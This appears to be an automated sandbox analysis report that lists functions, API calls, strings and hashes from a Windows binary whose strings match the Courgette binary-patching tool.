Can't write output, xrefs: 00000001400021B3
gen1a, xrefs: 000000014000114F
No operation specified, xrefs: 00000001400020EC
-asm <assembly_file_in> <exec_file_out>, xrefs: 0000000140002010
Unsupported, xrefs: 000000014000134D
'patch' input, xrefs: 0000000140001805, 0000000140002171
apply, xrefs: 0000000140001116
-genbsdiff <old_in> <new_in> <patch_out>, xrefs: 00000001400020B4
disadj, xrefs: 00000001400010F0

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID:
String ID: %s Executable$'new' input$'old' input$'patch' input$-apply <old_in> <patch_in> <new_out>$-apply failed.$-applybsdiff <old_in> <patch_in> <new_out>$-applybsdiff failed.$-asm <assembly_file_in> <exec_file_out>$-dis <exec_file_in> <assembly_file_out>$-disadj <old_in> <new_in> <new_assembly_file_out>$-gen <old_in> <new_in> <patch_out>$-gen failed.$-gen1[au] <old_in> <new_in> <patch_base_out>$-genbsdiff <old_in> <new_in> <patch_out>$-genbsdiff failed.$-supported <exec_file_in>$-xxx failed.$Can't open output$Can't write output$Corrupt patch$Disassembly failed (could be because of memory issues)$First argument must be one of: -supported, -asm, -dis, -disadj, -gen, -apply, -genbsdiff, -applybsdiff, or -gen1[au].$No operation specified$Not a courgette patch$Stream error (likely out of memory or disk space)$Unsupported$Wrong version patch$apply$applybsdiff$asm$courgette.log$dis$disadj$gen$gen1a$gen1u$genbsdiff$input$nologfile$supported
API String ID: 0-2830117632
Opcode ID: 805480aab10542881b33df42184fd97d55c6781dcd243036c92986e6415f3c7b
Instruction ID: 0cf609cc33c024e7782fcd5dd8a5a25284c89aeee5feace30b0d50c092f84540
Opcode Fuzzy Hash: 805480aab10542881b33df42184fd97d55c6781dcd243036c92986e6415f3c7b
Instruction Fuzzy Hash: 40923DB5204A8081EA66EB27F8553EB6361F7CD7C4F444026FB8A4BBBADE3DC5458740

Function 00000001400A2000 Relevance: 47.6, APIs: 6, Strings: 21, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 00000001400A25E4
l, xrefs: 00000001400A2253
s, xrefs: 00000001400A25B4
2, xrefs: 00000001400A25D4
., xrefs: 00000001400A25DC
l, xrefs: 00000001400A25F4
u, xrefs: 00000001400A220B
d, xrefs: 00000001400A2243
r, xrefs: 00000001400A25C4
u, xrefs: 00000001400A25AC
h, xrefs: 00000001400A2800
3, xrefs: 00000001400A25CC
e, xrefs: 00000001400A25BC
m, xrefs: 00000001400A2223
r, xrefs: 00000001400A2213
l, xrefs: 00000001400A25EC
n, xrefs: 00000001400A2233
l, xrefs: 00000001400A221B
l, xrefs: 00000001400A224B
., xrefs: 00000001400A223B
o, xrefs: 00000001400A222B

Memory Dump Source

Source File: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID:
String ID: .$.$2$3$d$d$e$h$l$l$l$l$l$m$n$o$r$r$s$u$u
API String ID: 0-3733223994
Opcode ID: e06427b7eb47e3d1fa387b22dd1f56745bf45ded69e7418fdb623ce5865672d9
Instruction ID: d930c4134ea7a51e29471f09e31d3c7f3931a9ed02b45d74d460ff58112e9f55
Opcode Fuzzy Hash: e06427b7eb47e3d1fa387b22dd1f56745bf45ded69e7418fdb623ce5865672d9
Instruction Fuzzy Hash: 7412E92661C6C485E3718F69E0443CFA2A1FBA9784F005126A7CC87BA9DF7ED584CF46

Function 0000000140058510 Relevance: 1.5, Strings: 1, Instructions: 202COMMON

Download Yara Rule

Strings

0, xrefs: 00000001400586B2

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 8bb2d24c8bc72b7e916a2e73aeec5f647dc31f68c059fd03dd705a5c14ffc85e
Instruction ID: 9663950a6672755f49b39717aafe266fd63ae5f727d6410f236f696799c38f6c
Opcode Fuzzy Hash: 8bb2d24c8bc72b7e916a2e73aeec5f647dc31f68c059fd03dd705a5c14ffc85e
Instruction Fuzzy Hash: 8371AF3520468486FBBACA2B90443EE67D1A749BC8F681D15FF41BB6F9CA37C845CB41

Function 0000000140016090 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 0000000140016115
GetCurrentDirectoryW.KERNEL32 ref: 0000000140016141
GetModuleFileNameW.KERNEL32 ref: 00000001400161B6
CreateFileW.KERNEL32 ref: 0000000140016465

Strings

debug.log, xrefs: 00000001400162CB, 00000001400163E7

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: File$Create$CurrentDirectoryModuleName
String ID: debug.log
API String ID: 4120427848-600467936
Opcode ID: 7206805589842cc783c6e0946fd2e4b8ffb4fba9a8659be175b88c727ee12cdb
Instruction ID: c5e9c5872daca75c052b95a3088718f8f0cac3e98bfefd2c837912f11d50b765
Opcode Fuzzy Hash: 7206805589842cc783c6e0946fd2e4b8ffb4fba9a8659be175b88c727ee12cdb
Instruction Fuzzy Hash: 6BB18B72700A4092EB129B22EA543E93371F789BD4F544616EB690BBF4DB7EC9A5C340

Function 000000014005D400 Relevance: 7.7, APIs: 5, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000014005D444

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 604c7d0d1a8d9fff6eccf7f6a9a2889addaf988ca64ca7aca61cb6946bdcb4a0
Instruction ID: 5ce8f4dc845f6e29fa634cc13cc4f85c93c2fd21172086099a4c082f703a19ad
Opcode Fuzzy Hash: 604c7d0d1a8d9fff6eccf7f6a9a2889addaf988ca64ca7aca61cb6946bdcb4a0
Instruction Fuzzy Hash: 6E818B326206509AFB22DBA798907ED37A0B74CBD8F404617FF4A57BB5DB368846C710

Function 0000000140015E10 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 167
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 0000000140015F99
DeleteFileW.KERNEL32 ref: 0000000140016052
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000140016084

Strings

vmodule, xrefs: 0000000140015E56, 0000000140015E96

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: CloseDeleteFileHandle_invalid_parameter_noinfo_noreturn
String ID: vmodule
API String ID: 2287319914-2939338212
Opcode ID: 21ca224a7dbfc56a1a168b3b3e9e7774ec353402125b70b3591adbbb964ada51
Instruction ID: 7ba4bc5c8b509bc1a33ccb47b70ffa395ece1dc05d6b268d7816ac04b958e480
Opcode Fuzzy Hash: 21ca224a7dbfc56a1a168b3b3e9e7774ec353402125b70b3591adbbb964ada51
Instruction Fuzzy Hash: 5A615932700A4485FA06EB63E8543E92362A74DBD8F444626FF594B7F5DF7AC9868340

Function 000000014000D759 Relevance: 6.1, APIs: 4, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000014000D759: CommandLineToArgvW.SHELL32 ref: 000000014000D881
Part of subcall function 000000014000D759: LocalFree.KERNEL32 ref: 000000014000D89C

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000014000D7FA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000014000D8FB

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ArgvCommandFreeLineLocal
String ID:
API String ID: 3500410017-0
Opcode ID: 99ecf087b5edab65e0d12d24edbcb1274bf9a301d999dc480a735af2eff7dd09
Instruction ID: d0837ecceb7cddd3fe7b8db59ed46b6f1c0c5b91f156dafff2bbf5045670a9d7
Opcode Fuzzy Hash: 99ecf087b5edab65e0d12d24edbcb1274bf9a301d999dc480a735af2eff7dd09
Instruction Fuzzy Hash: CF3152B271864442EE15D756F5493EEA362EBCDBE4F408216FB5D07BE9EE78C1828700

Function 000000014005E790 Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000014005E7B9
_invalid_parameter_noinfo.LIBCMT ref: 000000014005E851
_local_unwind.LIBVCRUNTIME ref: 000000014005E862

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_local_unwind
String ID:
API String ID: 1677304287-0
Opcode ID: 0b89fe1146f000c4c1bd80fccea9ac3e5bc82429767e92fa854761d3b8ef2cea
Instruction ID: 490ba564a6d914734b8133dd28591a41d534b19ad1879bc1424616536d812358
Opcode Fuzzy Hash: 0b89fe1146f000c4c1bd80fccea9ac3e5bc82429767e92fa854761d3b8ef2cea
Instruction Fuzzy Hash: FD31C3B261468482FA2ADB67D8013FD23A2B79DBC4F598511FB99072F6DF7AC500C301

Function 000000014005A100 Relevance: 4.5, APIs: 3, Instructions: 19
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,00000003,000000014005A213), ref: 000000014005A129
TerminateProcess.KERNEL32(?,?,00000003,000000014005A213), ref: 000000014005A134
ExitProcess.KERNEL32 ref: 000000014005A143

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: fb5dd8991c0893216ad25dfcb171411ba1c0af4d11667e53f0b86d76ae391af1
Instruction ID: c47387d1785849decc213bdbdc4aa027ddcf195e88a5258b873d405fe3b1b6ff
Opcode Fuzzy Hash: fb5dd8991c0893216ad25dfcb171411ba1c0af4d11667e53f0b86d76ae391af1
Instruction Fuzzy Hash: 61E04F3030170086EE56AB32AC953D93362AB8E791F105929EA06033B2CE3FC4498301

Function 0000000140057FD8 Relevance: 3.2, APIs: 2, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000140058001
_invalid_parameter_noinfo.LIBCMT ref: 00000001400581E0

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1a7bec5b53025f4d92a843d1514005e15e22f3d83cb0360db550d63c0b6dc664
Instruction ID: 829e51229c5d4e5e3721874760e444b39309aaff19a5c6b4fa943607d4a5b4a7
Opcode Fuzzy Hash: 1a7bec5b53025f4d92a843d1514005e15e22f3d83cb0360db550d63c0b6dc664
Instruction Fuzzy Hash: 8B617F72204A40CAE7B6CE2A84553EC3BA8E34DB98F141A15EF42672F9D736C486C719

Function 000000014005D8F8 Relevance: 3.1, APIs: 2, Instructions: 74
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32 ref: 000000014005D9AB
GetLastError.KERNEL32 ref: 000000014005D9C7

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 62e1b058a6c9a4b35592a088e93ff235a2ccaf126a4076875574b15e4b566216
Instruction ID: 8875f07bc22db1e660d0f0d1540705ca998485f963abb0fa2693261e8ea572ed
Opcode Fuzzy Hash: 62e1b058a6c9a4b35592a088e93ff235a2ccaf126a4076875574b15e4b566216
Instruction Fuzzy Hash: 4A21B132215A809AEB62DF2AE4447D977A0F74C7C0F448423FB8D83765DB39C555CB00

Function 0000000140067D9C Relevance: 3.1, APIs: 2, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 0000000140067E0E
GetFileType.KERNEL32 ref: 0000000140067E24

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 596b5605914feadcbadf41b6272fec82e7ee0dada9c73f700a86df6d6601cc35
Instruction ID: 863681fdb0d876365e4827cbdddac4cac1e726aa91bd1d1194852aa5fe8b4108
Opcode Fuzzy Hash: 596b5605914feadcbadf41b6272fec82e7ee0dada9c73f700a86df6d6601cc35
Instruction Fuzzy Hash: F921A532604A4040EB668B2698907A93766F75DBF4F381745E7AE077F4CA36CC85D340

Function 000000014005F474 Relevance: 1.6, APIs: 1, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000014005F4B6

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c10349311fa7b0d3145e96bb9c1f7ef2e072aaf2d39725b2dc77b08280179edf
Instruction ID: 2c2c549745086a6403e6508d83942da9de7ed5345f6ef64c154935310599c581
Opcode Fuzzy Hash: c10349311fa7b0d3145e96bb9c1f7ef2e072aaf2d39725b2dc77b08280179edf
Instruction Fuzzy Hash: 6741F6313056448AFE76CE67A5443BAA291B74CFE0F184624BFAA87BE5E63ED4419600

Function 000000014005E8C0 Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000014005E8E2

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f6e3051132d99a2f697d9d135da672cc22ef154c783530f20967e7c1974e57b1
Instruction ID: f611f28a4304fb441fca368d29ab3aa66a42ec32fa827d0791de14508c546cbe
Opcode Fuzzy Hash: f6e3051132d99a2f697d9d135da672cc22ef154c783530f20967e7c1974e57b1
Instruction Fuzzy Hash: 3F3169B2A10B9499EB9ACB61D8413EC37A5E7593E8F444712EBAD137E8EB36C154C340

Function 000000014005D314 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c07df4c306abe33d863687ba704b1f35c46472f9e37a76c453ec725f92a648
Instruction ID: d90b22a5ccef24fd36b02cd3addcf5d9b42896b7eafccc25fc86ec51e8e95a7f
Opcode Fuzzy Hash: 43c07df4c306abe33d863687ba704b1f35c46472f9e37a76c453ec725f92a648
Instruction Fuzzy Hash: B5218E326202508AF763EF63AC4179D3690AB887E4F595617FF15077F2CBBAC8818701

Function 000000014005A02C Relevance: 1.6, APIs: 1, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,00000000,000000014005DCE5,?,?,?,?,000000014005409C), ref: 000000014005A177

